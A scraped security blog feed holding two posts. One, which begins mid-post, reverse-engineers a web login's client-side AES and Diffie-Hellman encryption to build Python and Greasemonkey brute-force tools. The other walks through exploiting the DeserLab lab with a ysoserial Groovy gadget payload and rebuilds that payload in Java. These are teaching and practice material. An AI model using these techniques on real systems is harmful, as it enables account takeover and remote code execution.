Base64       : G3vCXn54ZV6gHq9hxV+S0ElFs619AccEnvq2WMRKPMQ=
Decoded bytes: 1b 7b c2 5e 7e 78 65 5e a0 1e af 61 c5 5f 92 d0 49 45 b3 ad 7d 01 c7 04 9e fa b6 58 c4 4a 3c c4

This indicate that it is most probably a block cipher with blocks of 16 bytes. If that doesn’t ring a bell, when you convert it to bits (8*16) it results in blocks of 128bit, which will probably make you think of AES even though we have no further evidence.

The exact block cipher and the way to confirm that it indeed is a Diffie Hellman key exchange we’ll figure out while we attempt to write our brute forcing script.

Our python script

Now that we at least have somewhat of an idea of what we have to implement, let’s get to work. Which in this case doesn’t mean get coding, but it means dive further into the inner workings of the encryption and then do some coding.

Since all of the encryption happens in the browser it is a good start to look at the javascript. When you look at the files in the /js/ folder you can quickly identify that ‘main.js’ probably contains all the logic, just due to sheer size. The first thing you have to do is beautify the javascript code either using the build in developer tools or using a custom plugin for your favourite editor like Atom or Sublime.

After doing that there are a couple of different strategies to locate the interesting code, one of my favourite ones is to just search for any of the previously identified crypto strings like ‘padding’, ‘ISO10126’ or search for default crypto strings like ‘encrypt’, ‘decrypt’, ‘aes’, ‘diffie hellman’, ‘random’. All of these search terms land you in the crypto code that we are looking for within the main.js file. Let’s see how to understand this without the need of fully understanding all the code.

The compatibility check

One things I learned long ago when dealing with cryptographic implementation across programming languages is to keep in mind that the implementations might be different and you should prepare for some long debugging sessions. To avoid that, I always try to find an easy to implement, yet important, part of the cryptography and implement only that part to verify the cryptography is compatible. Although it’s not a 100 percent test it does give you some insight.

For this compatibility test I choose to port the encryption of the username and password first, this was assuming it was probably AES and easy to implement. The assumed logic was as follow:

  • Debug javascript & find AES operation
  • Extract encryption key
  • Create python decryptor

Fire up the developer tools and place a break point on the following places:

  • loginSubmit: function(a) {
  • Connection.login(a)
  • aP.Username = at.dh.encodeString(aP.Username);
  • aP.Password = at.dh.encodeString(aP.Password)

If you wonder why on those places, when you look into the HTML of the page you see that the form and the submit button have their ‘onsubmit’  and ‘onclick’ set to ‘loginSubmit’. If you then go to the ‘main.js’ file and search for that string you find it exactly in one place. Using some good old fashioned reading (read down from that line) and applying some trial and error break points you can follow the execution flow and discover the above mentioned interesting function calls yourself. During the debug sessions I noticed that the Chrome developer tools seemed to work way better than the Firefox ones, as in: my break points actually triggered.

When you step over (sometimes into) those function you should be able to see the exact moment when your input is encrypted. So if we step into the ‘encodeString’ function we see the source for encrypting our string:

 this.encodeString = function(r) {
 var o = this.getSharedKey().substring(0, 96);
 var n = CryptoJS.enc.Hex.parse(o.substring(32, 96));
 var m = CryptoJS.enc.Hex.parse(o.substring(0, 32));
 var q = {
 iv: m
 };
 if (Settings.DefaultEncryptionPadding && CryptoJS.pad[Settings.DefaultEncryptionPadding]) {
 q.padding = CryptoJS.pad[Settings.DefaultEncryptionPadding]
 }
 return CryptoJS.AES.encrypt(r, n, q).ciphertext.toString(CryptoJS.enc.Base64)
 }

If you step through the above code and read it then you can conclude the following:

  • o is probably the result from the diffie hellman key exchange
  • q & m are the IV
  • n is the actual encryption key
  • r is the string to encrypt

So that means that if we take the encrypted value from our debugger and the value of the ‘o’ variable we should be able to decrypt it. You might be like, but you are missing the mode of operation!! Yes you are correct, but our aim is to not fully understand all code so let’s wing it ;) To run the code snippet below you need to ‘pip install pycrypto’ and ‘pip install Padding’.

 #decrypt values if key is known
 encdata = base64.urlsafe_b64decode('9OTg1OvudO7jOYOrnkttMA==')
 aesrawkey = '6b0df8a5406348aab2aa0883c3b3f4e55b45e00ad6959f7468e25e88c3eb166a3ee8934ceda08e4116b7afc05eae4d6c'
 aeskey = aesrawkey[32:96].decode('hex')
 aesiv = aesrawkey[0:32].decode('hex')
 cipher = AES.new(aeskey, AES.MODE_CBC, aesiv )
 print removePadding(cipher.decrypt(encdata),16,'Random')

If you run the above it should print ‘sdf’ which is the username I entered into the username field. Now this is good, it means that the cryptography seems to be compatible without any special kind of effort.

The diffie hellman implementation

At the core of what we need is the diffie hellman key exchange (DHke) implementation. The reason is that the actual encryption key is being derived from this, so without it we are doomed. In the previous paragraph we already spotted one of the DHke functions: getSharedKey() if you step into that function and then scroll up you are right in the middle of all the DHke code, namely:

Creating the private key

var g = randBigInt(160, 0);

Create the public key

this.createPublicKey = function() {
 var n = b(e(bigInt2str(powMod(d, g, f), 16)));
 n.push(0);
 var m = Base64.encodeArray(n);
 return m
 }

Create the shared key

this.getSharedKey = function() {
 var m = b(e(bigInt2str(powMod(str2bigInt(l, 16, 1), g, f), 16)));
 return CryptoJS.enc.Base64.parse(Base64.encodeArray(m)).toString()
 }

If you read up on Diffie Hellman it is pretty doable to port it to python and in the script you can read the full implementation. Here are the three functions in python:

def genprivkey():
 return getrandbits(160)

def genpubkey(g,prkey,prime):
 pubkey = pow(g, prkey, prime)
 packedpubkey = pack_bigint(pubkey)
 return base64.b64encode(bytes(packedpubkey))

def gensharedkey(rpubkey, privkey, prime):
 decrkey = base64.b64decode(rpubkey)
 rkey = unpack_bigint(decrkey)
 sharedkey = pow(rkey,privkey,prime)
 return sharedkey

The biggest pitfall I was stuck on for a while is the way you need to work with big integers, as in, if you want to encode them, splice them into different bytes etc. You have to pack/unpack them!! Here are the code snippets as borrowed from stackoverflow:

def pack_bigint(i):
 #https://stackoverflow.com/a/14764681
 b = bytearray()
 while i:
 b.append(i & 0xFF)
 i >>= 8
 return b

def unpack_bigint(b):
 #https://stackoverflow.com/a/14764681
 b = bytearray(b) # in case you're passing in a bytes/str
 return sum((1 << (bi*8)) * bb for (bi, bb) in enumerate(b))

With the core of the diffie hellman key exchange in place the rest of the script is self explanatory. It creates the XML requests, does the necessary parsing to read/write the values and sends/receives the requests. The script is sometimes a bit wonky…but to demonstrate this process it is fine in my opinion :)

Greasemonkey: the last resort

What if the previous analysis had failed or some strange cryptographic interoperability bug would have appeared? In that case it’s nice to have a backup option that works universally (more or less) and doesn’t require us to fully understand what is going on. Of course it also has some drawbacks like less speed (although my coding skills are probably to blame).

The universal solution I choose was to create a Greasemonkey script, since this enables you to control the form as if you were entering credentials and submitting them yourself manually. The most important restriction of a Greasemonkey script is that as far as I know you cannot (easily) read local file to use as input for your brute force attempts. This results in the script containing the usernames and passwords to test embedded as arrays. This script can more or less be easily adapted to brute force other login forms.

 

The above screenshot shows the result of the Greasemonkey script in which you can see an added button to start the brute force, as well as the current attempt scrolling by in the developer tool console. The logic that we need to implement for the script is pretty straightforward:

  • Display a button on the website to start brute forcing
  • loop through username and password combinations
  • attempt to login
  • detect if the attempt was successful

Most of the above logic is not difficult, it just takes some getting used to how browsers and JavaScript work (a lot of event driven programming). Luckily for us stackoverflow exists (the code contains references to the answers used) and we don’t need it to be the most beautiful script in the world (thus ignoring part of the event driven approach). I’ll explain a couple of interesting highlights from the script:

Attempt login, sleep, attempt again

This is the part were I really created ugly code, since I didn’t really expect JavaScript to not have a sleep function. After reading up on it it and experimenting with sleep alternatives it makes sense, since it freezes your browser. So I ended wrapping the entire thing up in a function and calling this function with the setInterval function every 5 seconds. This of course implies that I have to keep some form of state and thus I went all crazy with global variables :( More precisely I replaced for loops with while loops and global variables so that I can exit the while loop after each attempt, but resume at that exact point when the function gets called again.

The actual submission of the form took some searching around and reading since the default approach that I encountered in most examples didn’t work. Normally you can gather the form element or the submit button element and call the click() or submit() functions on them. I didn’t fully figure out why, but for this specific form it did not work. The following however works great and should be pretty universal:


 //https://stackoverflow.com/a/6337307
 var evt = document.createEvent ("HTMLEvents");
 evt.initEvent ("click", true, true);
 document.getElementById('loginWindow_submit').dispatchEvent(evt);

Detecting a successful login

//https://stackoverflow.com/a/2497223
var oldTitle = document.title;
window.setInterval(function()
{
 if (document.title !== oldTitle)
 {
 console.log("[!!!!!!!!] YAY! "+currUsr+" "+currPwd);
 if (currUsr != ""){
 foundcreds = 1;
 }
 }
 oldTitle = document.title;
}, 100); //check every 100ms</pre>

The above code uses the setInterval function to check for changes of the page title every 100 milliseconds. You could also solve this by subscribing to events, but this seemed to be easier to understand as well as pretty generic since most websites change the title when you successfully login.

The rest of the script is pretty self explanatory and should be reusable although I haven’t tested it. Development of these type of scripts doesn’t take long and are in my opinion a good fallback when the cryptographic operations become too complicated, custom or you just don’t have enough time to go through them.

Conclusion

If you lasted till here, thank you for taking your time in reading this blog post! I hope you learned an additional approach towards brute forcing forms that implement some form of data encryption. As usual the road towards the tools is much more interesting than the tools themselves :)


Filed under: general, security Tagged: AES, diffie-hellman, encryption, greasemonkey, javascript, milestone xprotect, python

Understanding & practicing java deserialization exploits

$
0
0

A good periodic reminder when attempting to learn things is that reading about the subject is not the same as actually practicing the subject you read about. That is why it’s always a good thing to practice what you have read. In this case we are going to dive into the well known Java deserialization bugs that have been around for a while now. The best part of practicing it is that you get to really know the subject at hand and can attempt to improve upon it for your own needs. For this blog post we are going to attempt the following:

  1. Exploit a deserialization bug
  2. Manually create our payload

So to clarify, step one will be about practicing the exploitation of a serialization bug with current tools as well as explaining the approach taken. The second step zooms in on the payload; what exactly is the payload? How can we construct it by hand? With the end result of fully understanding how it works as well as having an approach to understand similar bugs in the future.

I’ll mention all tools used throughout the blog post, but at the very least you’ll need the following:

That is the bug we will be exploiting. The reason for choosing a simulated bug is the fact that we can control all aspects of it and thus better understand how a deserialization exploit really works.

Exploiting DeserLab

First of all make sure you read the blog post in which DeserLab is presented and java deserialization is explained. One of the nicer things of this blog post is the in depth information on the Java serialization protocol itself. Be aware that by continuing to read this section you’ll spoil solving DeserLab yourself. For the rest of this section we’ll be working with the precompiled jar files, so make sure you download those from his github. Now let’s get started:

My usual approach for most problems is to first understand how the target operates in a normal manner. For DeserLab this means we need to do the following:

  • Run the server and client
  • Capture the traffic
  • Understand the traffic

For running the server and client you can use the following commands:

java -jar DeserLab.jar -server 127.0.0.1 6666
java -jar DeserLab.jar -client 127.0.0.1 6666

The input/output from the above commands looks like this:

java -jar DeserLab.jar -server 127.0.0.1 6666
 [+] DeserServer started, listening on 127.0.0.1:6666
 [+] Connection accepted from 127.0.0.1:50410
 [+] Sending hello...
 [+] Hello sent, waiting for hello from client...
 [+] Hello received from client...
 [+] Sending protocol version...
 [+] Version sent, waiting for version from client...
 [+] Client version is compatible, reading client name...
 [+] Client name received: testing
 [+] Hash request received, hashing: test
 [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6
 [+] Done, terminating connection.

java -jar DeserLab.jar -client 127.0.0.1 6666
 [+] DeserClient started, connecting to 127.0.0.1:6666
 [+] Connected, reading server hello packet...
 [+] Hello received, sending hello to server...
 [+] Hello sent, reading server protocol version...
 [+] Sending supported protocol version to the server...
 [+] Enter a client name to send to the server:
 testing
 [+] Enter a string to hash:
 test
 [+] Generating hash of "test"...
 [+] Hash generated: 098f6bcd4621d373cade4e832627b4f6

The above is not really what we are after, since the main question is of course, how does it implement the deserialization part? To answer this question you can capture the traffic on port 6666 with wireshark, tcpdump or tshark. To capture the traffic with tcpdump you can execute the following command:

tcpdump -i lo -n -w deserlab.pcap 'port 6666'

Before you read any further make sure you browse through the pcap file using wireshark. Together with Nick his blog post you should be able to manually understand what is going on and at the very least identify that serialized Java objects are being passed back and forth:

Extraction of serialized data

Now that we have a pretty strong indication of the fact that serialized data is being transmitted, let’s start to understand what is actually being transmitted. Instead of writing my own parser for it based on the information provided in the blog post I decided to use SerializationDumper which is also one of the tools mentioned as well as jdeserialize which is an older and still functional tool. Before we can use any of those tools we need to prepare the data, so let’s transform the pcap into data that we can analyze.

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=, | grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

Now that one liner can probably be shortened a lot, for now it works. Let’s split it into digestable chunks since all it does is convert the pcap data into a single line of hex encoded output string. The first thing it does is convert the pcap into a text representation containing only the data transmitted and the TCP source and destination port numbers:

tshark -r deserlab.pcap -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,

Which looks like this:

50432,,6666
6666,,50432
50432,,6666
50432,aced0005,6666
6666,,50432
6666,aced0005,50432

Like you can see in the above snippet during the TCP three way handshake there is no data, hence the ‘,,’ part. After that the client sends the first bytes which get ACKed by the server and then the server sends some bytes back and so forth. The second part of the commands converts this into a string with just the payloads selected based on the port at the beginning of the line:

| grep -v ',,' | grep '^6666,' | cut -d',' -f2 | tr '\n' ':' | sed s/://g

The above only selects the server replies, if you want the client data you need to change the port number. The end result looks like this:

aced00057704f000baaa77020101737200146e622e64657365722e486[...]

That is something we can work with, since it is the clean representation of the data send and received. Let’s analyse this with both tools, first we’ll use SerializationDumper, then we’ll use jdeserialize. If you are wondering why both tools? Well because it is just good practice (if possible) to perform analysis with different tools to spot potential bugs or issues. If you just stick to one tool you might be heading down the wrong path without noticing. It is also just fun to try out different tools ;)

Analysis of serialized data

With SerializationDumper it is pretty straight forward since you can just pass the hex representation of the serialized data as the first argument like this:

java -jar SerializationDumper-v1.0.jar aced00057704f000baaa77020101

Which should result in output similar to the following:

STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
 TC_BLOCKDATA - 0x77
 Length - 4 - 0x04
 Contents - 0xf000baaa
 TC_BLOCKDATA - 0x77
 Length - 2 - 0x02
 Contents - 0x0101
 TC_OBJECT - 0x73
 TC_CLASSDESC - 0x72
 className
 Length - 20 - 0x00 14
 Value - nb.deser.HashRequest - 0x6e622e64657365722e4861736852657175657374

If we want to analyse the same serialized data with jdeserialize we have to first build jdeserialize, you can use ant for that with the provided build.xml file. I opted for manual compilation which you can achieve with the following commands:

mkdir build
javac -d ./build/ src/*
cd build
jar cvf jdeserialize.jar *

The above should produce a jar file that we can work with, to test it you can run it like this and it should display the help information:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize

Since jdeserialize expects a file we can convert hex representation of the serialized data as follow with python (mind the shortening of the hex strings for blog lay out purposes):

open('rawser.bin','wb').write('aced00057704f000baaa770201[...]3236323762346636'.decode('hex'))

We can now analyse this file by running jdeserialize with the file name as the first argument which should produce:

java -cp jdeserialize.jar org.unsynchronized.jdeserialize rawser.bin
 read: [blockdata 0x00: 4 bytes]
 read: [blockdata 0x00: 2 bytes]
 read: nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
 //// BEGIN stream content output
 [blockdata 0x00: 4 bytes]
 [blockdata 0x00: 2 bytes]
 nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
 //// END stream content output

//// BEGIN class declarations (excluding array classes)
 class nb.deser.HashRequest implements java.io.Serializable {
 java.lang.String dataToHash;
 java.lang.String theHash;
 }

//// END class declarations

//// BEGIN instance dump
 [instance 0x7e0002: 0x7e0000/nb.deser.HashRequest
 field data:
 0x7e0000/nb.deser.HashRequest:
 dataToHash: r0x7e0003: [String 0x7e0003: "test"]
 theHash: r0x7e0004: [String 0x7e0004: "098f6bcd4621d373cade4e832627b4f6"]
 ]
 //// END instance dump

The first thing we learn from the output of both serialized data analysis tools is the fact that it IS serialized data :) The second thing we learn is the fact that apparently an object ‘nb.deser.HashRequest’ is transferred between client and server.  If we also combine this analysis with our previous wireshark examination we also learn that the username is send as a string inside a TC_BLOCKDATA type:

 TC_BLOCKDATA - 0x77
 Length - 9 - 0x09
 Contents - 0x000774657374696e67

'000774657374696e67'.decode('hex')
'\x00\x07testing'

This gives us a pretty good idea of how the DeserLab client and the DeserLab server communicate with each other. Now let’s see how we can exploit this using ysoserial.

Exploitation of DeserLab

Since we have a clear understanding of the communication due to the pcap analysis as well as the analysis of the serialized data we can build our own python script with some hard coded data in which we’ll embed the ysoserial payload. To keep it simple and have it match the wireshark flow I decided to implement it almost exactly like the wireshark flow, which looks like this:

 mydeser = deser(myargs.targetip, myargs.targetport)
 mydeser.connect()
 mydeser.javaserial()
 mydeser.protohello()
 mydeser.protoversion()
 mydeser.clientname()
 mydeser.exploit(myargs.payloadfile)

You can find the full script over here. Like you can see the easy mode approach is to hard code all the java deserialization exchanges. You might wonder why after mydeser.clientname() the function mydeser.exploit(myargs.payloadfile) appears and maybe more importantly how I decided it should go there. Let’s have a look at my thought process as well as how to actually generate and send the ysoserial payload.

After reading several articles (references at the end of this blog post) on java deserialization there are two things that stuck with me:

  1. Most of the vulns have to do with deserialization of Java objects
  2. Most of the vulns have to do with deserialization of Java objects

So when we review the information exchange there is one place where Java objects are exchanged (as far as I can tell). This can be easily spotted in the output from the serialization analysis since it either contains ‘ TC_OBJECT – 0x73’  or

//// BEGIN stream content output
[blockdata 0x00: 4 bytes]
[blockdata 0x00: 2 bytes]
[blockdata 0x00: 9 bytes]
nb.deser.HashRequest _h0x7e0002 = r_0x7e0000;
//// END stream content output

where we can clearly see that the last part of the stream content is the ‘nb.deser.HashRequest’ object. The place where this object is read, is also the last part of the exchange, thus explaining why the code has the exploit function as the last one in the code. So now that we know where our exploit payload should go, how do we choose, generate and send the payload?

The code of DeserLab itself doesn’t really contain anything useful that we can exploit by modifying a serialized exploit. The reason why will become apparent in the next section ‘Manually building the payload’ for now let’s just accept that. So that means that we have to look for additional libraries that might contain code that could help us. In the case of DeserLab there is only one library which is Groovy, thus also a really big hint as for the ysoserial payload that we should use ;) Do keep in mind that for real world application you might need to actually decompile unknown libraries yourself and hunt for useful code, also called gadgets yourself.

Since we know the library that we’ll use for exploitation, the generation of the payload is pretty straightforward:

java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin

An important thing to remember is that the payload delivery is blind, so if you want to know if it worked you usually need some way to detect it. For now a ping to localhost will be sufficient, but in real world scenarios you need to get a bit more creative than this.

Now that we have everything in place you’d think that it is just a matter of firing off the payload right? You are right, except that we must not forget that the Java serialization header exchange has already taken place. This means that we must strip the first four bytes of our payload and send it away:

./deserlab_exploit.py 127.0.0.1 6666 payload_ping_localhost.bin
2017-09-07 22:58:05,401 - INFO - Connecting
2017-09-07 22:58:05,401 - INFO - java serialization handshake
2017-09-07 22:58:05,403 - INFO - protocol specific handshake
2017-09-07 22:58:05,492 - INFO - protocol specific version handshake
2017-09-07 22:58:05,571 - INFO - sending name of connected client
2017-09-07 22:58:05,571 - INFO - exploiting

If everything went as planned you should see the following:

sudo tcpdump -i lo icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
22:58:06.215178 IP localhost > localhost: ICMP echo request, id 31636, seq 1, length 64
22:58:06.215187 IP localhost > localhost: ICMP echo reply, id 31636, seq 1, length 64
22:58:07.215374 IP localhost > localhost: ICMP echo request, id 31636, seq 2, length 64

Well that’s it we have successfully exploited DeserLab. This brings me to the following two sections in which we will hopefully better understand what the payload does that we send to DeserLab.

Manually building the payload

The best way to understand what our payload is doing is to rebuild the exact same payload ourselves, yes that means writing Java. The question  however is where do we start? We can look at the serialized payload, just like we did when we looked at the pcap. The following one liner converts the payload to a hex string that we can analyse with SerializationDumper or you can analyse the file with jdeserialize if you prefer.

open('payload.bin','rb').read().encode('hex')

So let’s dive into the details and in this specific case, really understand how this all works. Side note, of course after figuring this all out you always find that one page that already describes it, so you can just skip this section and read this instead. The rest of this sections will try to focus on my approach. One of the important pillars of my approach was also reading the source of the ysoserial implementation of this exploit. I won’t be mentioning that constantly, but if you are wondering how I figured out the flow, it is due to the reading of the ysoserial implementation.

After putting the payload through the tools, in both cases it results in some pretty long output with a lot of Java classes. The main class name to take note of is the first one on the output ‘sun.reflect.annotation.AnnotationInvocationHandler’ . This class probably looks familiar since it seems to be the entry point for a lot of deserialization exploits. Other things that caught my attention are ‘java.lang.reflect.Proxy’, ‘org.codehaus.groovy.runtime.ConvertedClosure’ and ‘org.codehaus.groovy.runtime.MethodClosure’. The reason they all caught my attention is because they reference the library that we used for exploitation as well as known classes from online article that explain Java deserialization exploits and matches the classes I saw in the ysoserial source.

There is one important concept that you need to be aware of and that is fact that when you perform deserialization attacks you are sending the ‘saved’ state of an object sort of speak. This means that you fully depend on the behavior on the receiving side and more specifically you depend on the actions taken when your ‘saved’ state is deserialized. This means that if the other side does not invoke any methods of the objects that you send, you will not have remote code execution. This means that the only influence that you have is the setting of properties of the objects that you send.

Now that the concept is clear it means that the first class that we send should have one of it’s methods called automatically if we want to achieve code execution, which explain why that first class is so special. If we look at the code of the AnnotationInvocationHandler we can see that the constructor accepts a java.util.map object and the method readObject calls a method on the Map object. Like you probably know from reading other articles, readObject is called automatically when a stream is deserialized. Let’s start building our own exploit as we go, based on this information and by borrowing code from multiple other articles (referenced at the end of this post and in the code) we create the following. If you want to understand the code read up on reflection.

 //this is the first class that will be deserialized
 String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
 //access the constructor of the AnnotationInvocationHandler class
 final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
 //normally the constructor is not accessible, so we need to make it accessible
 constructor.setAccessible(true);

This is usually the part where I sometimes spent a couple of hours debugging and reading up on all the things I don’t know, since if you would attempt to compile this well you learn a lot. So here is the same code snippet which you can actually compile:

//regular imports
import java.io.IOException;

//reflection imports
import java.lang.reflect.Constructor;

public class ManualPayloadGenerateBlog{
 public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException {
 //this is the first class that will be deserialized
 String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
 //access the constructor of the AnnotationInvocationHandler class
 final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
 //normally the constructor is not accessible, so we need to make it accessible
 constructor.setAccessible(true);
 }
}

You can use the following commands to compile and run the code, even though it won’t do anything:

javac ManualPayloadGenerateBlog
java ManualPayloadGenerateBlog

When you expand upon this code just remember the following:

  • Google the printed error codes
  • The class name should equal the file name
  • Knowing Java helps ;)

The above code makes the initial entry point class available and the constructor accessible, but what parameters do we need to feed the constructor? Most examples have something along the lines of:

constructor.newInstance(Override.class, map);

The ‘map’ parameter I understood, that is the object on which the ‘entrySet’ method will be called during the initial readObject invocation. The first parameter I don’t fully understand the inner workings of, but the main gist is the fact that inside the readObject method it is checked to make sure the first parameter is of type ‘AnnotationType’. We accomplish this by providing the buildin ‘Override’ class which is of that type.

Now we get to the fun part, going from ‘ok makes sense’ to ‘how does this work?!?!’. To understand that, it is important to realize that the second parameter is a Java Proxy object and NOT a simple Java map object. What does this even mean? At least that was my reaction when I read that explanation initially. This article does a great job of explaining Java Dynamic Proxies as well as provide nice code examples. Here is a quote from the article:

Dynamic proxies allow one single class with one single method to service multiple method calls to arbitrary classes with an arbitrary number of methods. A dynamic proxy can be thought of as a kind of Facade, but one that can pretend to be an implementation of any interface. Under the cover, it routes all method invocations to a single handler – the invoke() method.

Put more simply as I understood it, it can pretend to be a Java map object and then routes all calls to the original Map object methods to a single method of another class. Let’s visualize what we have understood until now:

This means we could attempt to expand our source with such a Map object, for example like this:

final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, <unknown-invocationhandler>);

Mind the invocationhandler that we still need to fit in, but don’t have. This is the part where Groovy finally fits in, since up until now we remained in the realm of the regular Java classes. The reason why Groovy fits in is because it has an InvocationHandler. So when the InvocationHandler is called it eventually leads to code execution like this:

final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("ping 127.0.0.1", "execute"), "entrySet");
final Map map = (Map) Proxy.newProxyInstance(ManualPayloadGenerateBlog.class.getClassLoader(), new Class[] {Map.class}, closure);

Like you can see in the above code we now finally have our invocationhandler as the ConvertedClosure object. You can confirm this by decompiling the Groovy library and when you look at the ConvertedClosure class, you’ll see that it extends the ConversionHandler class and if you decompile that one you’ll see:

public abstract class ConversionHandler
 implements InvocationHandler, Serializable

The fact that it implements the InvocationHandler explains why we can use it in our Proxy object. One thing that I didn’t understand however is how the Groovy payload went from being called through a Map proxy to actual code execution. You can use a decompiler to look at the Groovy library, but often I find I understand it better when supplementing code reading with a google query. In this case I searched for what I imagined could be a frequent development challenge:

groovy execute shell command

The above query probably lands you on a variety of pages with answers like this one or this one. Which in essence tells us that apparently String objects have an additional method which is ‘execute’. I often use the above query to deal with environments that I’m not familiar with, since executing shell commands is often a requirement for developers for which the answer can often be found on the internet. This helped me complete the full picture of how this payload works, which in my mind now visualizes to the following:

The full source code can be found here.  You can compile and run the code like this:

javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
java -cp .:DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate > payload_manual.bin

When firing this off with our python exploit it should have the exact same result as the ysoserial payload. To my surprise the payloads even have the same hash:

sha256sum payload_ping_localhost.bin payload_manual.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_ping_localhost.bin
4c0420abc60129100e3601ba5426fc26d90f786ff7934fec38ba42e31cd58f07 payload_manual.bin

Thank you for taking your time to read this article and even more important I hope it helps you to exploit Java deserialization bugs as well as better understand them.

References


Filed under: general, security Tagged: deserialization, groovy, java, ysoserial
Viewing all 34 articles
Browse latest View live